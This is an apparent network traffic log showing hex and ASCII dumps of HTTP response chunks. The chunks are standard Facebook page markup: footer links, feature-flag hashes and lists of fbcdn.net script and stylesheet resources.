                                                                                                                                                                                    2023-01-05 08:01:25 UTC20074INData Raw: 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 68 69 5f 49 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 68 69 2d 69 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35
                                                                                                                                                                                    Data Ascii: billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u0025
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20075INData Raw: 74 6c 65 3d 22 53 69 67 6e 20 55 70 20 66 6f 72 20 46 61 63 65 62 6f 6f 6b 22 3e 53 69 67 6e 20 55 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 2f 22 20 74 69 74 6c 65 3d 22 4c 6f 67 20 69 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 22 3e 4c 6f 67 20 49 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 4d 65 73 73 65 6e 67 65 72 2e 22 3e 4d 65 73 73 65 6e 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 69 74 65 2f 22 20 74 69 74 6c 65 3d 22 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 20 66 6f 72 20 41 6e 64 72 6f 69 64 2e 22 3e 46 61 63 65 62 6f 6f 6b 20
                                                                                                                                                                                    Data Ascii: tle="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20076INData Raw: 65 62 6f 6f 6b 20 53 65 72 76 69 63 65 73 20 64 69 72 65 63 74 6f 72 79 2e 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 76 6f 74 69 6e 67 69 6e 66 6f 72 6d 61 74 69 6f 6e 63 65 6e 74 65 72 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 63 32 6c 30 5a 51 25 33 44 25 33 44 22 20 74 69 74 6c 65 3d 22 53 65 65 20 74 68 65 20 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 2e 22 3e 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65
                                                                                                                                                                                    Data Ascii: ebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20078INData Raw: 69 3e 3c 61 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 39 22 20 74 69 74 6c 65 3d 22 52 65 76 69 65 77 20 6f 75 72 20 74 65 72 6d 73 20 61 6e 64 20 70 6f 6c 69 63 69 65 73 2e 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 68 65 6c 70 2f 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 30 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 48 65 6c 70 20 43 65 6e 74 65 72 2e 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 65 6c 70 2f 36 33 37 32 30 35 30 32 30 38 37 38 35 30 34 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 43 6f
                                                                                                                                                                                    Data Ascii: i><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Co
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20079INData Raw: 2c 22 68 61 73 68 22 3a 22 41 54 36 38 6f 66 70 63 53 70 37 43 41 7a 4d 64 46 34 51 22 7d 2c 22 31 32 39 31 30 32 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 31 39 4c 73 65 49 47 31 6e 77 71 33 6f 70 55 73 22 7d 2c 22 31 33 39 39 32 31 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 67 75 43 57 31 65 79 49 6b 4f 56 31 45 38 47 34 22 7d 2c 22 31 34 30 31 30 36 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 35 61 65 74 4e 35 47 62 33 72 65 49 58 56 36 64 45 22 7d 2c 22 31 35 39 36 30 36 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 4a 48 75 44 57 74 61 4f 71 52 75 42 55 5a 5a 49 22 7d 2c 22 31
                                                                                                                                                                                    Data Ascii: ,"hash":"AT68ofpcSp7CAzMdF4Q"},"1291023":{"result":false,"hash":"AT519LseIG1nwq3opUs"},"1399218":{"result":true,"hash":"AT6guCW1eyIkOV1E8G4"},"1401060":{"result":true,"hash":"AT5aetN5Gb3reIXV6dE"},"1596063":{"result":false,"hash":"AT7JHuDWtaOqRuBUZZI"},"1
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20081INData Raw: 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 70 49 30 59 6b 78 33 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 65 5c 2f 72 5c 2f 36 7a 6d 68 6d 62 6c 6c 70 57 77 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4d 37 5c 2f 6a 6c 43 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 46 5c 2f 72 5c 2f 50 74 6d 66 78 4c 56 77 41 62 37 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35
                                                                                                                                                                                    Data Ascii: Wp8lg5Kz","nc":1},"pI0Ykx3":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ye\/r\/6zmhmbllpWw.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"M7\/jlCR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/r\/PtmfxLVwAb7.js?_nc_x=Ij3Wp8lg5
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20082INData Raw: 55 53 5c 2f 4c 48 55 78 41 34 6f 36 4a 32 35 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 47 65 62 33 7a 49 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 38 4a 46 34 5c 2f 79 36 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4d 6e 42 39 33 66 31 5f 31 31 4e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33
                                                                                                                                                                                    Data Ascii: US\/LHUxA4o6J25.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"dGeb3zI":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i8JF4\/y6\/l\/en_US\/MnB93f1_11N.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20084INData Raw: 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4a 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6c 32 67 55 79 5f 6f 72 78 66 37 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 50 56 73 32 34 4e 41 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 41 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 74 43 6f 36 37 4a 6e 6f 68 34 73 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4f 4b 38 67 5c 2f 69 54 22 3a 7b 22 74 79
                                                                                                                                                                                    Data Ascii: "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/l\/0,cross\/l2gUy_orxf7.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"PVs24NA":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yA\/l\/0,cross\/tCo67Jnoh4s.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"OK8g\/iT":{"ty
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20085INData Raw: 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4e 5c 2f 72 5c 2f 34 64 71 6a 4b 4a 52 4c 6f 4a 30 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 6c 38 2b 31 50 32 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 49 5c 2f 72 5c 2f 75 47 75 65 39 76 73 30 47 7a 54 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 45 7a 36 31 41 33 51 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68
                                                                                                                                                                                    Data Ascii: rsrc.php\/v3\/yN\/r\/4dqjKJRLoJ0.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"il8+1P2":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yI\/r\/uGue9vs0GzT.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Ez61A3Q":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.ph
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20087INData Raw: 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 39 30 50 34 5c 2f 79 41 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 6d 4f 2d 54 69 31 38 5a 69 42 41 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 58 4a 55 6b 52 78 38 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 74 5c 2f 72 5c 2f 5f 39 5f 6b 67 4b 78 6d 44 73 4a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 5a 6e 78 5a 56 41 63 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74
                                                                                                                                                                                    Data Ascii: \/static.xx.fbcdn.net\/rsrc.php\/v3i90P4\/yA\/l\/en_US\/mO-Ti18ZiBA.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"XJUkRx8":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yt\/r\/_9_kgKxmDsJ.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ZnxZVAc":{"type":"css","src":"ht
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20088INData Raw: 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 74 75 70 37 70 4a 41 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 6f 35 45 34 5c 2f 79 42 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 30 6d 4a 44 4f 57 49 43 6a 6a 36 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 2b 2b 57 65 7a 75 52 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 33 69 34 5c 2f 79 5a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 36 55
                                                                                                                                                                                    Data Ascii: x=Ij3Wp8lg5Kz","nc":1},"tup7pJA":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3io5E4\/yB\/l\/en_US\/0mJDOWICjj6.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"++WezuR":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iL3i4\/yZ\/l\/en_US\/6U
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20090INData Raw: 44 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 6a 7a 51 34 5c 2f 79 77 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 33 45 34 71 35 73 55 64 6d 32 66 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 74 72 35 38 44 58 6c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 4a 32 73 4c 75 71 33 52 43 58 30 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 63
                                                                                                                                                                                    Data Ascii: D":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ijzQ4\/yw\/l\/en_US\/3E4q5sUdm2f.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"tr58DXl":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/J2sLuq3RCX0.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"c
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20091INData Raw: 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 75 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 45 58 4c 42 73 69 30 37 5a 32 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6a 6a 50 42 58 4b 6c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 4a 6c 71 6f 4f 75 54 6e 66 4e 6b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 34 57 75 33 4b 42 51 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e
                                                                                                                                                                                    Data Ascii: rsrc.php\/v3iLl54\/yu\/l\/en_US\/EXLBsi07Z2u.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"jjPBXKl":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/JlqoOuTnfNk.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"4Wu3KBQ":{"type":"css","src":"https:\/\/static.xx.fbcdn
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20093INData Raw: 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5a 5c 2f 72 5c 2f 74 56 73 68 70 31 4f 49 56 39 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 53 57 78 33 79 4e 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 72 5c 2f 67 5f 5f 65 56 35 4f 58 53 58 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6f 45 34 44 6f 66
                                                                                                                                                                                    Data Ascii: "x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yZ\/r\/tVshp1OIV9l.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"SWx3yNv":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/g__eV5OXSXl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"oE4Dof
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20094INData Raw: 5b 22 53 67 44 30 47 31 71 22 2c 22 64 76 78 49 54 75 6f 22 2c 22 69 71 61 4e 64 37 76 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 75 5a 6e 59 6e 6a 41 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 3a 7b 22 72 22 3a 5b 22 66 42 4e 79 7a 64 34 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 31 34 37 76 78 35 41 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 75 5a 6e 59 6e 6a 41 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 44 4f
                                                                                                                                                                                    Data Ascii: ["SgD0G1q","dvxITuo","iqaNd7v"],"rds":{"m":["BanzaiScuba_DEPRECATED"],"r":["uZnYnjA"]},"be":1},"AsyncRequest":{"r":["fBNyzd4","+CEjbBy","SgD0G1q","ORfF6wp","147vx5A","e3dyWaF"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["uZnYnjA"]},"be":1},"DO
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20096INData Raw: 22 6a 73 6b 46 6a 75 45 22 2c 22 5a 6f 59 53 2b 4c 69 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 65 41 69 6a 39 5a 39 22 2c 22 34 6e 43 72 37 59 46 22 2c 22 46 4a 76 47 4b 5c 2f 6a 22 2c 22 67 69 74 74 2b 6d 4b 22 2c 22 53 67 44 30 47 31 71 22 2c 22 55 46 62 4b 58 4a 4d 22 2c 22 76 70 74 55 4a 79 38 22 2c 22 33 6d 63 36 79 62 76 22 2c 22 50 75 64 36 42 32 5a 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 6d 36 50 63 6c 49 51 22 2c 22 69 6c 38 2b 31 50 32 22 2c 22 64 76 78 49 54 75 6f 22 2c 22 67 63 44 34 4e 63 52 22 2c 22 45 7a 36 31 41 33 51 22 2c 22 53 5a 37 44 71 43 42 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 6d 4f 32 52 55 6f 47 22 2c 22 61 6d 6c 4b 4f 78 6b 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 4d 37 5c
                                                                                                                                                                                    Data Ascii: "jskFjuE","ZoYS+Li","+CEjbBy","eAij9Z9","4nCr7YF","FJvGK\/j","gitt+mK","SgD0G1q","UFbKXJM","vptUJy8","3mc6ybv","Pud6B2Z","pI0Ykx3","m6PclIQ","il8+1P2","dvxITuo","gcD4NcR","Ez61A3Q","SZ7DqCB","kOEHvpu","ORfF6wp","mO2RUoG","amlKOxk","eMkMxHZ","uyLLtYc","M7\
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20097INData Raw: 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 54 61 67 73 22 3a 7b 22 72 22 3a 5b 22 72 72 6e 53 4d 64 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 6c 2b 7a 59 45 30 73 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 61 67 54 6f 6b 65 6e 69 7a 65 72 22 3a 7b 22 72 22 3a 5b 22 72 72 6e 53 4d 64 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 75 5a 6e 59 6e 6a 41 22 2c 22 6d 30 7a 4c 6d 36 49 22 2c 22 74 75 65 37 4e 33 65 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 30 43 4e 77 48 33 6f 22 2c 22 64 76 78 49 54 75 6f 22 2c 22 6c 2b 7a 59 45 30 73 22 2c 22 52 77 4e 47 46 74 38 22 2c 22 50 55 64 36 34 39 6b
                                                                                                                                                                                    Data Ascii: ,"be":1},"PhotoTags":{"r":["rrnSMd9","fBNyzd4","+CEjbBy","l+zYE0s","uyLLtYc","e3dyWaF"],"be":1},"TagTokenizer":{"r":["rrnSMd9","fBNyzd4","uZnYnjA","m0zLm6I","tue7N3e","jskFjuE","+CEjbBy","SgD0G1q","pI0Ykx3","0CNwH3o","dvxITuo","l+zYE0s","RwNGFt8","PUd649k
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20098INData Raw: 53 5a 37 44 71 43 42 22 2c 22 4f 52 66 46 36 77 70 22 2c 22 31 34 37 76 78 35 41 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 54 30 62 6e 53 70 59 22 2c 22 65 33 64 79 57 61 46 22 2c 22 4b 42 72 72 65 57 4d 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 74 74 58 70 77 70 52 22 2c 22 67 49 5a 67 73 58 6a 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22
